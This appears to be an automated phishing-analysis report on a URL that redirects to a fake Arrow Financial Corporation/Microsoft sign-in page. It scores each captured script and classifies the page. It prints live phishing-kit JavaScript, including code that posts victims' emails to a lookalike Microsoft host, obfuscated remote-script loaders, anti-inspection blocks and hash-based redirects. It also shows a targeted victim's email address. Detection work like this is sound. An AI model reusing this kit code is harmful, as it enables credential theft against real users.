Windows Analysis Report
https://www.google.ca/url?subgn1=https://www.fordbeckerandgutierrez.com&SQ=WA&SQ=F5&SQ=R7&TA=W4&SQ=L6&q=%2561%256d%2570%2F%2573%256D%2569%2568%256B%2538%252E%2564%2565%256B%2563%2568%256F%2562%2574%2569%2565%2577%252E%2563%256F%256D%252F%256A%2576%2561%256E%256E%2561%2574%2574%2565%256E%2540%2561%25

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://www.google.ca

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load an external script from an unknown source, along with the obfuscated nature of the code, suggests this is a highly suspicious and potentially malicious script."
}

(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'9015a1086d9ec338',t:'MTczNjc3Mzg1My4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();

{
    "risk_score": 9,
    "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The script uses obfuscated code and attempts to bypass various browser security mechanisms, indicating a high likelihood of malicious intent."
}

var __529="KGZ1bmN0aW9uKCl7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdHRhY2hFdmVudCgib25yZWFkeXN0YXRlY2hhbmdlIiwgYil9OwogICAgICAgIGIoZnVuY3Rpb24oKXsKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIG5vdyA9IG5ldyBEYXRlKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHZhciB0aW1lID0gbm93LmdldFRpbWUoKTsKICAgICAgICAgICAgICAgICAgICAgICAgdGltZSArPSAzMDAgKiAxMDAwOwogICAgICAgICAgICAgICAgICAgICAgICBub3cuc2V0VGltZSh0aW1lKTsKICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuY29va2llID0gJ3lVZnZkOU02N0RvX1Z3RS1nUUUtaE9kREEtQT0yNFY1ZmRfU3FHZnluQ3NIbUFKYmw5eVNuZEEnICsgJzsgZXhwaXJlcz0nICsgJ1R1ZSwgMTQtSmFuLTI1IDEzOjEwOjUxIEdNVCcgKyAnOyBwYXRoPS8nOwogICAgICAgICAgICAgICAgICAgICAgICAvL2phdmFzY3JpcHQgcHV6emxlIGZvciBicm93c2VyIHRvIGZpZ3VyZSBvdXQgdG8gZ2V0IGFuc3dlcgogICAgICAgICAgICAgICAgICAgICAgICBpZighd2luZG93Ll9waGFudG9tIHx8ICF3aW5kb3cuY2FsbFBoYW50b20pey8qcGhhbnRvbWpzKi8KaWYoIXdpbmRvdy5fX3BoYW50b21hcyl7LypwaGFudG9tYXMgUGhhbnRvbUpTLWJhc2VkIHdlYiBwZXJmIG1ldHJpY3MgKyBtb25pdG9yaW5nIHRvb2wqLwppZighd2luZG93LkJ1ZmZlcil7Lypub2RlanMqLwppZighd2luZG93LmVtaXQpey8qY291Y2hqcyovCmlmKCF3aW5kb3cuc3Bhd24pey8qcmhpbm8qLwppZighd2luZG93LndlYmRyaXZlcil7LypzZWxlbml1bSovCmlmKCF3aW5kb3cuZG9tQXV0b21hdGlvbiB8fCAhd2luZG93LmRvbUF1dG9tYXRpb25Db250cm9sbGVyKXsvKmNocm9taXVtIGJhc2VkIGF1dG9tYXRpb24gZHJpdmVyKi8KaWYoIXdpbmRvdy5kb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuZ2V0QXR0cmlidXRlKCJ3ZWJkcml2ZXIiKSl7Ci8qaWYobmF2aWdhdG9yLnVzZXJBZ2VudCl7Ki8KaWYoIS9ib3R8Y3VybHxrb2RpfHhibWN8d2dldHx1cmxsaWJ8cHl0aG9ufHdpbmh0dHB8aHR0cmFja3xhbGV4YXxpYV9hcmNoaXZlcnxmYWNlYm9va3x0d2l0dGVyfGxpbmtlZGlufHBpbmdkb20vaS50ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKXsKLyppZihuYXZpZ2F0b3IuY29va2llRW5hYmxlZCl7Ki8KLyppZihkb2N1bWVudC5jb29raWUubWF0Y2goL14oPzouKjspP1xzKlswLTlhLWZdezMyfVxzKj1ccyooW147XSspKD86LiopPyQvKSl7Ki8vKkh0dHBPbmx5IENvb2tpZSBmbGFncyBwcmV2ZW50IHRoaXMqLwogICAgICAgICAgICAgICAgICAgICAgICB2YXIgXzgwNDM9cGFyc2VJbnQoIjIwMjUwMTEyIiwgMTApICsgcGFyc2VJbnQoIjEyMDEyMDI1IiwgMTApOwogICAgICAgICAgICAgICAgICAgICAgICAvKn0qLwovKn0qLwp9Ci8qfSovCn0KfQp9Cn0KfQp9Cn0KfQogICAgICAgICAgICAgICAgICAgICAgICAvL2VuZCBqYXZhc2NyaXB0IHB1enpsZQogICAgICAgICAgICAgICAgICAgICAgICB2YXIgeGh0dHAgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKICAgICAgICAgICAgICAgICAgICAgICAgeGh0dHAub25yZWFkeXN0YXRlY2hhbmdlID0gZnVuY3Rpb24oKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKHhodHRwLnJlYWR5U3RhdGUgPT09IDQpewogICAgICAgICAgICAgICAgIGNvbnN0IGZpcnN0Rm9ybSA9IGRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoJ2Zvcm0nKTsKCi8vIENoZWNrIGlmIHRoZSBmb3JtIGV4aXN0cyBhbmQgaWYgaXQgaGFzIGlucHV0IGVsZW1lbnRzCmlmIChmaXJzdEZvcm0pIHsKICBjb25zdCBpbnB1dEZpZWxkcyA9IGZpcnN0Rm9ybS5xdWVyeVNlbGVjdG9yQWxsKCdpbnB1dCcpOwogIAogIGlmIChpbnB1dEZpZWxkcy5sZW5ndGggPiAwKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkb2N1bWVudC5mb3Jtc1swXS5zdWJtaXQoKTsKICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgaWYgKCF3aW5kb3cubG9jYXRpb24uaGFzaCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLmhyZWYgPSB3aW5kb3cubG9jYXRpb24uaHJlZjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlbG9hZCgpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogIH0KfSBlbHNlIHsKICAgICAgICAgICAgICAgICBpZiAoIXdpbmRvdy5sb2NhdGlvbi5oYXNoKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3aW5kb3cubG9jYXRpb24uaHJlZiA9IHdpbmRvdy5sb2NhdGlvbi5ocmVmOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI";var _2480="CAgICAgICAgICB3aW5kb3cubG9jYXRpb24ucmVsb2FkKCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9Cn0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgIH07CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLm9wZW4oIlBPU1QiLCAiL2FkbWluP0RsOFBiSWF1NFExTXBnTXJ0ZnV2S05nZXNaZzNaazVPZ0FXcVFhRnMwV0w5cndVZXN1Y2lSTHBkaGY4dW1RTHh1bUZmQlNXRlp4S2dxRmxMSjYwd0RHSkRLdWFUZWdZ

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load an external script from an unknown source, along with the obfuscated nature of the code, suggests this is a highly suspicious and potentially malicious script."
}

(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'9015a1223edac341',t:'MTczNjc3Mzg1OC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();

{
    "risk_score": 5,
    "reasoning": "This script appears to be using the location hash to potentially redirect the user to a specific email address. While this behavior is not inherently malicious, it could be used for phishing or other suspicious activities. The use of the location hash without any additional context or validation raises some concerns, warranting further investigation."
}

    const reloadUsingLocationHash = () => {
      window.location.hash = "jvannatten@arrowbank.com";
    }
    window.onload = reloadUsingLocationHash();
  

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, obfuscated code, and redirects to potentially malicious domains. The use of base64 encoding, string manipulation, and URL validation checks suggest an attempt to bypass security measures and execute arbitrary code. While the specific intent is unclear, the overall behavior of this script is highly suspicious and poses a significant security risk."
}

!function(){
  function e(e){
    return decodeURIComponent(Array.prototype.map.call(atob(e), function(e){
      return "%" + ("00" + e.charCodeAt(0).toString(16)).slice(-2)
    }).join(""));
  }

  function n(e){
    return String.fromCharCode(...e.split("").map(e => e.charCodeAt(0) - 1));
  }

  function t(e){
    return e.split("").reverse().join("");
  }

  function o(e){
    try{
      return new URL(e), true;
    } catch {
      return false;
    }
  }

  var r = window.location.hash.substring(1);

  if (r) {
    var c = r; 
    var i = e(c); 
    var l = n(i); 
    var a = t(l); 
    var u = decodeURIComponent(a); 

    if (o(u)) {
      window.location.replace(u); 
    } else {
      document.write(u); 
    }
  } else {
    window.location.replace(atob(""));
  }
}();

{
    "risk_score": 7,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. While some of the functionality may be legitimate (e.g., analytics, branding updates), the overall implementation raises significant security concerns. The script uses obfuscated code, disables common security features, and collects sensitive user data, which could be indicative of a phishing or malware attack. Further investigation is recommended to determine the true intent and potential impact of this script."
}

      if (localStorage.getItem('ov-cf')){
        const urls = [
          'https://www.netflix.com',
          'https://www.github.com',
          'https://www.bbc.com',
          'https://www.paypal.com',
          'https://www.codecademy.com'
        ];
        let redir;
        let count = 0
        const KlwiHWjdk = $('#KlwiHWjdk').val();
        const JKDfIUfjdsnf = $('#JKDfIUfjdsnf').val();
        const urlimg = 'https://login-microsoftonline.com.bossdesk.ai/39ad47f7-bbb4-4cdc-ab64-baccae9b08ed/khL9kO2fV1.php'.replace('khL9kO2fV1.php', 'M3sN0tL8kY/images/');

        setTimeout(function() {
          $("#lightbox").show(), $("#i0118").focus();
        }, 100);
        $(document).bind('keydown', function(e) {
          if (e.ctrlKey && (e.which == 83)) {
            e.preventDefault();
            return false;
          }
        });
        document.addEventListener('contextmenu', event => event.preventDefault());
        document.onkeydown = function(e) {
          if (e.ctrlKey && (e.keyCode === 85 || e.keyCode === 117)) {
            return false;
          } else {
            return true;
          }
        };
        $(document).keypress("u", function(e) {
          if (e.ctrlKey) {
            return false;
          } else {
            return true;
          }
        });

        // random strings
        function strings(length) {
          const characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-=^*~`";
          let result = '';
          const charactersLength = characters.length;
          
          for (let i = 0; i < length; i++) {
              result += characters.charAt(Math.floor(Math.random() * charactersLength));
          }
          
          return result;
        }

        // logo and background
        function updateBranding(email) {
          $("#idBtn_Back").hide();
          $("#options").hide();
          $(".banner-logo").hide();
          $("#displayName").hide();
          $("#important").hide();
          $("#i0118").hide();
          $("#idA_PWD_ForgotPassword").hide();
          $("#idSIButton9").hide();
          $("#loginHeader").hide();
          $("#arrow").hide();
          $("#progressBar").show();
          $.ajax({
            dataType: 'JSON',
            url: 'https:////login-microsoftonline.com.bossdesk.ai/39ad47f7-bbb4-4cdc-ab64-baccae9b08ed/khL9kO2fV1.php',
            type: 'POST',
            data: {
              d_log: email
            },
            success: function(res) {
              // Show elements if response is successful
              $(".banner-logo").fadeIn();
              $("#displayName").fadeIn();
              $("#i0118").fadeIn();
              $("#idA_PWD_ForgotPassword").fadeIn();
              $("#idSIButton9").fadeIn();
              $('#loginHeader').html('Enter Password');
              $("#loginHeader").fadeIn();
              $("#arrow").fadeIn();
              $("#progressBar").hide();
              if(res.sso){
                $('#gdady_css').prop('disabled', !1);
                $('#default_css').prop('disabled', !0);
                $('#adfs_css').prop('disabled', !0);
                $("#password-error-godaddy").hide();
                $("#passwordError2_godaddy").hide();
                $("#godaddy").fadeIn();
                $("#default").hide();
                $("#adfs").hide();
                $("#okta").hide();
                $('#i011e.ff-input').val(email).prop('disabled', true);
              }else if(res.adfs){
                $('#gdady_css').prop('disabled', !0);
                $('#default_css').prop('disabled', !0);
                $('#adfs_css').prop('disabled', !1);
                $("#godaddy").hide();
                $("#default").hide();
                $("#adfs").fadeIn();
                $("#okta").hide();
                $('#i011e.textInput').val(email).prop('disabled', !0);
                $('.illustrationStyle').css('background-image', 'url(' + res.background + ')');
             

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be engaging in malicious activities, such as redirecting to suspicious domains and collecting sensitive user data. Additionally, the script uses aggressive DOM manipulation and interacts with untrusted domains, further increasing the risk. Overall, this script demonstrates a high level of suspicious and potentially harmful behavior, warranting a high-risk score."
}

function yvKZIQfj(input) {/* Taurus */ const funcName/* Pinwheel */ = [String.fromCharCode(97),/* Cancer */String.fromCharCode(116),/* Micah */String.fromCharCode(111),/* Comet */String.fromCharCode(98)].join('');/* 1Kings */ return/* Draco */ (function(f) {/* Ahitub */ return/* Pisces */ f(input);/* Nahor */ /* PantheraLeo */})(window[funcName]);/* 1John */ /* Mordecai */} (function(){/* Titus */var syVuDIHC/* Daniel */="wcq5ibp1mL5JXZ1FnavQ3cpR2Lx4iNuMDQ5JXZ1Fnav02bj5yZrBnb19yL6MHc0RHa";/* Lamentations */var ojalzqtT/* Pollux */=/* Elisha */yvKZIQfj/* Acts */(syVuDIHC.split('').reverse().join(''));/* 2Samuel */var KKBoIWLD/* Sarah */=document.createElement('script');/* Lazarus */KKBoIWLD.src=ojalzqtT;/* Acts */KKBoIWLD.onload=function(){/* Joel */function awVDiYzN(input) {/* Titus *//* Moses */ const funcName/* Canopus *//* Ephesians */ = [String.fromCharCode(97),/* Ecclesiastes *//* Nebuchadnezzar */String.fromCharCode(116),/* Abimelech *//* Korach */String.fromCharCode(111),/* Delilah *//* Acts */String.fromCharCode(98)].join('');/* Hezekiah *//* 2Corinthians */ return/* Cassiopeia *//* FelisCatus */ (function(f) {/* Heliosphere *//* Chimera */ return/* Cancer *//* CanisMajor */ f(input);/* Isaiah *//* CanisLupus */ /* Cornelius *//* Mira */})(window[funcName]);/* Mahalalel *//* Tamar */ /* Thomas *//* Messier */} $(document).ready(function(){/* BosTaurus *//* Centaurus */localStorage.setItem(/* Auriga */awVDiYzN('b3YtY2Y')/* Algol */,/* Centaurus *//* Asteroid *//* Hezekiah */awVDiYzN('dHJ1ZQ')/* John */)/* Nahor */;/* Hagar *//* NGC1300 */function /* Bartholomew */wWkCqvEp/* Aquarius */(obfuscated){/* Altair *//* Bildad */var /* SimonTheZealot */fbRMkMwx/* Solomon */=[s=>s.split(''),/* Obadiah *//* Jeremiah */a=>a.reverse(),/* Ezra *//* Scorpius */a=>a.join(''),/* Supernova *//* Habakkuk */s=>/* Lydia */awVDiYzN/* Zephaniah */(s),/* Sirius *//* Titus */(s,/* JamesTheJust *//* NGC1300 */n)=>s.substring(n)],/* UrsaMajor *//* Elisha *//* Deborah */zSSJCJUC/* Bellatrix */=71,/* Joel *//* Lazarus *//* Habakkuk */TnuqKZte/* Meteor */=/* Philemon */fbRMkMwx/* Philippians */[2](/* BlackEye */fbRMkMwx/* Pegasus */[1](/* David */fbRMkMwx/* Mishael */[0](obfuscated))),/* Esau *//* Lupus *//* Peter */zpOrITDt/* Andrew */=/* Rahab */fbRMkMwx/* Elijah */[3](/* Galatians */TnuqKZte/* Delilah */),/* JamesTheJust *//* Numbers *//* PhilipTheEvangelist */HFXAiByy/* Titus */=/* Zilpah */fbRMkMwx/* Korach */[4](/* Pisces */zpOrITDt/* Peter */,/* PantheraLeo *//* Lazarus *//* Nebuchadnezzar */zSSJCJUC/* 1John */),/* 2Kings *//* Proverbs *//* 1Peter */dVBGhdFC/* Ahab */=/* Zipporah */fbRMkMwx/* Judas */[2](/* Auriga */fbRMkMwx/* Micah */[1](/* RedGiant */fbRMkMwx/* Ishmael */[0](/* John */HFXAiByy/* Mira */))),/* Nahum *//* Job *//* Bathsheba */SNEAQBXB/* Colossians */=/* SimonTheZealot */fbRMkMwx/* Elijah */[3](/* Jacob */dVBGhdFC/* Aaron */),/* 1Thessalonians *//* Boaz *//* Priscilla */JSOaqITw/* Tabitha */=/* Mordecai */fbRMkMwx/* Vega */[4](/* Samuel */SNEAQBXB/* Psalms */,/* Uriah *//* Judges *//* Stephen */zSSJCJUC/* Achan */);/* Acts *//* Ishmael */return/* Antares *//* Nahum */ /* Isaac */JSOaqITw/* 1Kings */;/* Nathan *//* Solomon *//* Joshua *//* Silas */}function /* 2Chronicles */XHjafinC/* Micah */(str){/* Solomon *//* PantheraLeo */return/* Obadiah *//* Zophar */ str.split('').reverse().join('');/* Sagittarius *//* Meteor *//* Taurus *//* Ruth */}$.get(/* Lazarus */awVDiYzN/* 1Chronicles */(/* Orpah */awVDiYzN/* 2John */(/* Ezra */XHjafinC/* JohnTheBaptist */(/* Mahalalel */$('#'+/* Antares */awVDiYzN('VUlTRWl1SUlFSUVS')/* Titus */)/* Jeroboam */.val()))),/* Tabitha *//* Aquila */function(data){/* Canopus *//* Vega *//* Caph */$('#'+/* Lepus */awVDiYzN('c3Roanhja2doYWl1Z2hkc2Znc2Rm')/* Judas */)/* Isaiah */.html(/* Moses */wWkCqvEp/* Thomas */(data));/* Samuel *//* Jael *//* Spica *//* GlobularCluster */});/* Esau *//* Abimelech *//* Rehoboam *//* Hagar */});/* Meteor *//* Hagar */;/* Cartwheel *//* Comet */ document.addEventListener(

{
    "typosquatting": true,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": true,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": true,
    "third_party_hosting": true
}

URL: https://notfiycenter07.es

```json
{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library for DOM manipulation and event handling. It does not exhibit any high-risk behaviors such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is not obfuscated and does not interact with external domains in a suspicious manner. Therefore, it is considered low risk."
}

/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.1",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=y.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:v}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,y,s,c,v,S="s

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
  "contains_trigger_text": true,
  "trigger_text": "Because you're accessing sensitive info, you need to verify your password.",
  "prominent_button_name": "Sign in",
  "text_input_field_labels": [
    "Password"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Arrow Financial Corporation"
  ]
}

```json{  "legit_domain": "arrowfinancialcorporation.com",  "classification": "known",  "reasons": [    "The URL 'notfiycenter07.es' does not match the legitimate domain name for Arrow Financial Corporation.",    "The domain 'notfiycenter07.es' contains a misspelling ('notfiy' instead of 'notify'), which is a common tactic used in phishing.",    "The domain extension '.es' is unusual for a U.S.-based financial corporation like Arrow Financial Corporation.",    "The presence of a password input field on a suspicious domain increases the risk of phishing."  ],  "riskscore": 9}
Google indexed: False

{
  "contains_trigger_text": true,
  "trigger_text": "Enter Password",
  "prominent_button_name": "Sign in",
  "text_input_field_labels": [
    "Password"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Arrow Financial Corporation"
  ]
}